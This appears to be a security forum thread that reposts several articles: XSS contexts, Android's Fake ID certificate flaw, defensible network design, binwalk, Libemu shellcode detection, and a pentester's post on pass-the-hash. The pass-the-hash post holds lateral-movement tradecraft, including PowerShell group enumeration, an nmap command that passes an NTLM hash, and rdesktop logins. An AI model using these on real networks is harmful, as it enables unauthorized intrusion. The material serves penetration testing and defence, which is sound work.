terminate the comment context and switch to statement context. d) Strings being assigned to Executable Sinks This is a single-quoted are double-quoted string that is either passed to the expression property or a property that takes an URL like background-image. In both cases the data inside the string context can be interpreted as JavaScript code by the browser. Though I have mentioned the standard way to escape out of the different contexts, these are by no means the only ways. There are plenty of browser quirks that allow escaping out of contexts in strange ways. To find out about them I would recommend you get the Web Application Obfuscation book and also refer the HTML5 Security Cheatsheet and the fuzz results of Shazzer. There is a good change you might already know about OWASP's XSS Prevention CheatSheet, you might also find this other XSS Protection Cheat Sheet to be useful. Posted by IronWASP at 5:56 AM Sursa: IronWASP - Open Source Advanced Web Security Testing Platform: Contexts and Cross-site Scripting - a brief intro
-
[h=1]HIP14-Defeating UEFI/WIN8 secureboot[/h] Kw-domjg5UkbN-pLc Publicat pe 29 iul. 2014 By John Butterworth Hack in Paris:the leading IT security technical event in France organized by Sysdream
-
[h=1]HIP14-Pentesting NoSQL exploitation framework[/h] IKw-domjg5UkbN-pLc Publicat pe 29 iul. 2014 By Francis Alexander Hack in Paris:the leading IT security technical event in France organized by Sysdream
-
[h=3]Defensible Network Architecture 2.0[/h]Four years ago when I wrote The Tao of Network Security Monitoring I introduced the term defensible network architecture. I expanded on the concept in my second book, Extrusion Detection. When I first presented the idea, I said that a defensible network is an information architecture that is monitored, controlled, minimized, and current. In my opinion, a defensible network architecture gives you the best chance to resist intrusion, since perfect intrusion prevention is impossible. I'd like to expand on that idea with Defensible Network Architecture 2.0. I believe these themes would be suitable for a strategic, multi-year program at any organization that commits itself to better security. You may notice the contrast with the Self-Defeating Network and the similarities to my Security Operations Fundamentals. I roughly order the elements in a series from least likely to encounter resistance from stakeholders to most likely to encounter resistance from stakeholders. A Defensible Network Architecture is an information architecture that is: Monitored. The easiest and cheapest way to begin developing DNA on an existing enterprise is to deploy Network Security Monitoring sensors capturing session data (at an absolute minimum), full content data (if you can get it), and statistical data. If you can access other data sources, like firewall/router/IPS/DNS/proxy/whatever logs, begin working that angle too. Save the tougher data types (those that require reconfiguring assets and buying mammoth databases) until much later. This needs to be a quick win with the data in the hands of a small, centralized group. You should always start by monitoring first, as Bruce Schneier proclaimed so well in 2001. Inventoried. This means knowing what you host on your network. If you've started monitoring you can acquire a lot of this information passively. This is new to DNA 2.0 because I assumed it would be already done previously. Fat chance! Controlled. Now that you know how your network is operating and what is on it, you can start implementing network-based controls. Take this anyway you wish -- ingress filtering, egress filtering, network admission control, network access control, proxy connections, and so on. The idea is you transition from an "anything goes" network to one where the activity is authorized in advance, if possible. This step marks the first time where stakeholders might start complaining. Claimed. Now you are really going to reach out and touch a stakeholder. Claimed means identifying asset owners and developing policies, procedures, and plans for the operation of that asset. Feel free to swap this item with the previous. In my experience it is usually easier to start introducing control before making people take ownership of systems. This step is a prerequisite for performing incident response. We can detect intrusions in the first step. We can only work with an asset owner to respond when we know who owns the asset and how we can contain and recover it. Minimized. This step is the first to directly impact the configuration and posture of assets. Here we work with stakeholders to reduce the attack surface of their network devices. You can apply this idea to clients, servers, applications, network links, and so on. By reducing attack surface area you improve your ability to perform all of the other steps, but you can't really implement minimization until you know who owns what. Assessed. This is a vulnerability assessment process to identify weaknesses in assets. You could easily place this step before minimization. Some might argue that it pays to begin with an assessment, but the first question is going to be: "What do we assess?" I think it might be easier to start disabling unnecessary services first, but you may not know what's running on the machines without assessing them. Also consider performing an adversary simulation to test your overall security operations. Assessment is the step where you decide if what you've done so far is making any difference. Current. Current means keeping your assets configured and patched such that they can resist known attacks by addressing known vulnerabilities. It's easy to disable functionality no one needs. However, upgrades can sometimes break applications. That's why this step is last. It's the final piece in DNA 2.0. So, there's DNA 2.0 -- MICCMAC (pronounced "mick-mack"). You may notice the Federal government is adopting parts of this approach, as mentioned in my post Feds Plan to Reduce, then Monitor. I prefer to at least get some monitoring going first, since even incomplete instrumentation tells you what is happening. Minimization based on opinion instead of fact is likely to be ugly. Did I miss anything? Posted by Richard Bejtlich at 22:22 Sursa: TaoSecurity: Defensible Network Architecture 2.0
-
Android crypto blunder exposes users to highly privileged malware "Fake ID" exploits work because Android doesn't properly inspect certificates. by Dan Goodin - July 29 2014, 2:00pm GTBST A slide from next week's Black Hat talk titled Android Fake ID vulnerability. Bluebox Security The majority of devices running Google's Android operating system are susceptible to hacks that allow malicious apps to bypass a key security sandbox so they can steal user credentials, read e-mail, and access payment histories and other sensitive data, researchers have warned. The high-impact vulnerability has existed in Android since the release of version 2.1 in early 2010, researchers from Bluebox Security said. They dubbed the bug Fake ID, because, like a fraudulent driver's license an underage person might use to sneak into a bar, it grants malicious apps special access to Android resources that are typically off-limits. Google developers have introduced changes that limit some of the damage that malicious apps can do in Android 4.4, but the underlying bug remains unpatched, even in the Android L preview. The Fake ID vulnerability stems from the failure of Android to verify the validity of cryptographic certificates that accompany each app installed on a device. The OS relies on the credentials when allocating special privileges that allow a handful of apps to bypass Android sandboxing. Under normal conditions, the sandbox prevents programs from accessing data belonging to other apps or to sensitive parts of the OS. Select apps, however, are permitted to break out of the sandbox. Adobe Flash in all but version 4.4, for instance, is permitted to act as a plugin for any other app installed on the phone, presumably to allow it to add animation and graphics support. Similarly, Google Wallet is permitted to access Near Field Communication hardware that processes payment information. According to Jeff Forristal, CTO of Bluebox Security, Android fails to verify the chain of certificates used to certify an app belongs to this elite class of super privileged programs. As a result, a maliciously developed app can include an invalid certificate claiming it's Flash, Wallet, or any other app hard coded into Android. The OS, in turn, will give the rogue app the same special privileges assigned to the legitimate app without ever taking the time to detect the certificate forgery. "All it really takes is for an end user to choose to install this fake app, and it's pretty much game over," Forristal told Ars. "The Trojan horse payload will immediately escape the sandbox and start doing whatever evil things it feels like, for instance, stealing personal data." Other apps that receive special Android privileges include device management extensions from a company known as 3LM. Organizations use such apps to add security enhancements and other special features to large fleets of phones. An app that masqueraded as one of these programs could gain almost unfettered administrative rights on phones that were configured to work with the manager. Forristal hasn't ruled out the existence of other apps that are automatically assigned heightened privileges from Android. Changes introduced in Android 4.4 limit some of the privileges Android grants to Flash. Still, Forristal said the failure to verify the certificate chain is present in all Android devices since 2.1. That means malicious apps can bypass sandbox restrictions by impersonating Google Wallet, 3LM managers, and any other apps Android is hardcoded to favor. A spokesman for Google issued the following statement: We appreciate Bluebox responsibly reporting this vulnerability to us; third-party research is one of the ways Android is made stronger for users. After receiving word of this vulnerability, we quickly issued a patch that was distributed to Android partners, as well as to AOSP. Google Play and Verify Apps have also been enhanced to protect users from this issue. At this time, we have scanned all applications submitted to Google Play as well as those Google has reviewed from outside of Google Play, and we have seen no evidence of attempted exploitation of this vulnerability. The statement didn't say exactly what Google did to patch the vulnerability or specify if any Android partners have yet to distribute it to end users. This article will be updated if company representatives elaborate beyond the four sentences above. As Ars has documented previously, it's not unusual for attackers to sneak malicious apps into the official Google Play marketplace. If it's possible for approved apps to contain cryptocurrency miners, remote access trojans, or other hidden functions, there's no obvious reason they can't include cryptographic credentials fraudulently certifying they were spawned by 3LM, Google, Microsoft, or any other developer granted special privileges. "With this vulnerability, malware has a way to abuse any one of these hardcoded identities that Android implicitly trusts," said Forristal, who plans to divulge additional details at next week's Black Hat security conference. "So malware can use the fake Adobe ID and become a plugin to other apps. Malware can also use the 3LM to control the entire device." Listing image courtesy of Greayweed. Sursa: Android crypto blunder exposes users to highly privileged malware | Ars Technica
-
devttys0 released this 3 days ago · 11 commits to master since this release Highlights: Python3 support Raw deflate detection/extraction Improved API Improved speed More (and improved) signatures Faster entropy scans Much more... Lots of thanks to everyone who submitted patches and bug reports! Sursa: https://github.com/devttys0/binwalk/releases/tag/v2.0.0
-
Pass-the-Hash is Dead: Long Live Pass-the-Hash July 29, 2014 by harmj0y You may have heard the word recently about how a recent Microsoft patch has put all of us pentesters out of a job. Pass-the-hash is dead, attackers can no longer spread laterally, and Microsoft has finally secured its authentication mechanisms. Oh wait: This is a fully-patched Windows 7 system in a fully-patched Windows 2012 domain. So what’s going on here, what has Microsoft claimed to do, what have they actually done, and what are the implications of all of this? The security advisory and associated knowledge base article we’re dealing with here is KB2871997 (aka the Mimikatz KB Besides backporting some of the Windows 8.1 protections that make extracting plaintext credentials from LSASS slightly more difficult, the advisory includes this ominous (to pentesters, at least) statement “Changes to this feature include: prevent network logon and remote interactive logon to domain-joined machine using local accounts…“. On the surface, this looks like it totally quashes the Windows pivoting vectors we’ve been taking advantage of for so long, [insert doom and gloom here]. Microsoft even originally titled their original advisory, “Update to fix the Pass-The-Hash Vulnerablity”, but quickly changed it to “Update to improve credentials protection and management” http://www.infosecisland.com/blogview/23787-Windows-Update-to-Fix-Pass-the-Hash-Vulnerability-Not.html It’s true, Microsoft has definitely raised the bar: accounts that are members of the localgroup “Administrators” are no longer able to execute code with WMI or PSEXEC, use schtasks or at, or even browse the open shares on the target machine. Oh, except (as pwnag3 reports and our experiences confirm) the RID 500 built-in Administrator account, even if it’s renamed. While Windows 7 installs will now disable this account by default and prompt for a user to set up another local administrator, many organizations used to standard advice and compliance still have loads of RID 500 accounts, enabled, all over their enterprise. Some organizations rely on this account for backwards compatibility reasons, and some use it as a way to perform vulnerability scans without passing around Domain Admin credentials. If a domain is built using only modern Windows OSs and COTS products (which know how to operate within these new constraints), and configured correctly with no shortcuts taken, then these protections represent a big step forward. Microsoft has finally start to wise up to some of its inherent security issues, which I seriously applaud them for. However, the vast majority of organizations are a Frankensteinian amalgamation of security/management products, old (and sometimes unpatched) servers, heterogenous clients, lazy admins, backwards-compatibility-focused engineers, and usability-focused business units. Regardless, accounts with this security identifier are almost certainly going to be enabled and around for a while. Additionally, Windows 2003 isn’t affected (which will surely linger around organizations significantly longer than Windows XP), and domain accounts which maintain Administrative access over a machine can still have their hashes passed to your heart’s content. Also, these local admin accounts should still work with psremoting if it’s enabled. Some organizations will leave the WinRM service still running as an artifact of deployment, and while you can’t use hashes for auth in this case, plaintext credentials can be specified for a remote PowerShell session. But let’s say everything’s set up fairly well, the default Administrator account is disabled, and you end up dumping the hash of another local admin user on a box. How is this going to look in the field when you try your normal pivoting, and what options are still open? Your favorite scanner will still likely flag the credentials as valid on machines with the same account reused, as the following examples with the local admin of ‘mike:password’ demonstrates: However, when you try to use PSEXEC or WMIS to trigger agents or commands, or use Impacket’s functionality to browse the file shares, you’ll encounter something like this: The “pth-winexe” example above shows the difference between invalid credentials (NT_STATUS_LOGON_FAILURE) and the new patch behavior. If you happen to have the plaintext, through group policy preferences, some Mimikatz luck, or cracking the dumped NTLM hashes, you can still RDP to a target successfully with something like rdesktop -u mike -p password 192.168.52.151. But be careful: if you’re going after a Windows 7 machine and a domain user is currently logged on, it will politely ask them if they want to allow your remote session in, meaning this is probably best left for after-hours. Also, interesting note: if you have hashes for a domain user and are dealing with the new restricted admin mode, you might be able to pass-the-hash with rdp itself! The Kali linux guys have a great writeup on doing just that with xfreerdp. So here we are, with the RID 500 local Administrator account, as well as any domain accounts granted administrative privileges over a machine, still being able to utilize Metasploit or the passing-the-hash toolkit to install agents or execute code on target systems. Seems like it would be useful to be able to enumerate what name the local RID 500 account is currently using, as well as any network users in the local Administrators group. Unfortunately, even if you get access to a basic user account on some target machine and get in a position to abuse Active Directory, you can’t query local administrators with WMI as you might like: But all hope is not lost, with backwards-compatibility, the bane of Microsoft’s existence, once again coming to our aid. The Active Directory Service Interfaces [ADSI] WinNT provider, can be used to query information from domain-attached machines, even from non-privileged user accounts. A remnant of NT4 domain deployments, the WinNT provider in some cases can allow a non-privileged domain user to query information from target machines, including things like all the local groups and associated members (with SIDs and all). If we have Powershell access on a Windows domain machine, you can try enumerating all the local groups on a target machine with something like: $computer = [ADSI]“WinNT://WINDOWS2,computer” $computer.psbase.children | where { $_.psbase.schemaClassName -eq ‘group’ } | foreach { ($_.name)[0]} If we want the members of a specific group, that’s not hard either: $members = @($([ADSI]“WinNT://WINDOWS2/Administrators”).psbase.Invoke(“Members”)) $members | foreach { $_.GetType().InvokeMember(“ADspath”, ‘GetProperty’, $null, $_, $null) } These functions have been integrated into Veil-PowerView, Get-NetLocalGroups and Get-NetLocalGroup respectively: Another function, Invoke-EnumerateLocalAdmins, has also been built and integrated. This will query the domain for hosts, and enumerate every machine for members of a specific local group (default of ‘Administrators’). There are options for host lists, delay/jitter between host enumerations, and whether you want to pipe everything automatically to a csv file: This gives you some nice, sortable .csv output with the server name, account, whether the name is a group or not, whether the account is enabled, and the full SID associated with the account. The built-in Administrator account is the one ending in *-500: And again, this is all with an unprivileged Windows domain account. If you just have a hash and want the same information without having to use PowerShell, the Nmap scripts smb-enum-groups.nse and smb-enum-users.nse can accomplish the same thing using a valid account for the machine (even a member of local admins!) along a password or hash: nmap -p U:137,T:139 –script-args ‘smbuser=mike,smbhash=8846f7eaee8fb117ad06bdd830b7586c’ –script=smb-enum-groups –script=smb-enum-users 192.168.52.151 If you want to use a domain account, set your flags to something like –script-args ‘smbdomain=DOMAIN,smbuser=USER,smbpass/smbhash=X’. You’ll be able to enumerate the RID 500 account name and whether it’s disabled, as well as all the members of the local Administrators group on the machine. If there’s a returned member of the Administrator group that doesn’t show up in the smb-enum-users list, like ‘Jason’ in this instance, it’s likely a domain account. This information can give you a better idea of what credentials will work where, and what systems/accounts you need to target. If you have any issues or questions with PowerView, submit any issues to the official Github page, hit me up on Twitter at @harmj0y, email me at will [at] harmj0y.net, or find me on Freenode in #veil, #armitage, or #pssec under harmj0y. And if you’re doing the Blackhat/Defcon gauntlet this year, come check out the Veil-Framework BH Arsenal booth and/or my presentation on post-exploitation, as well as all the other awesome talks lined up this year! Sursa: Pass-the-Hash is Dead: Long Live Pass-the-Hash – harmj0y
-
[h=2]On Breaking PHP-based cross-site scripting protection Mechanisms in the wild[/h] A talk by Ashar Javed @ Garage4Hackers WebCast (28-07-2014) Previously presented at OWASP Spain Chapter Meeting 13-06-2014, Barcelona (Spain) Slides: On Breaking PHP-Based Cross-Site Scripting Protections In The Wild by Ashar Javed
-
Shellcode Detection and Emulation with Libemu Introduction Libemu is a library which can be used for x86 emulation and shellcode detection. Libemu can be used in IDS/IPS/Honeypot systems for emulating the x86 shellcode, which can be further processed to detect malicious behavior. It can also be used together with Wireshark to pull shellcode off the wire to be analyzed, analyze shellcode inside malicous .rtf/.pdf documents, etc. It has a lot of use-cases and is used in numerous open-source projects like dionaea, thug, peepdf, pyew, etc., and it plays an integral part in shellcode analysis. Libemu can detect and execute shellcode by using the GetPC heuristics, as we will see later in the article. The very first thing we can do is download Libemu via Git with the following command: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]# git clone git://git.carnivore.it/libemu.git [/TD] [/TR] [/TABLE] If we would like to know how much code has been written for this project, we can simply execute sloccount, which will output the number of lines for each subdirectory and a total of 43,742 AnsiC code lines and 15 Python code lines. If we would rather take a look at nice graphs, we can visit the Ohloh web page to see something like below, where it’s evident that about 50k lines of code has been written. The installation instructions can be found at [1], which is why we won’t describe them in this article. We can also install the Pylibemu, so we can interact with Libemu directly from Python. Articol complet: Shellcode Detection and Emulation with Libemu - InfoSec Institute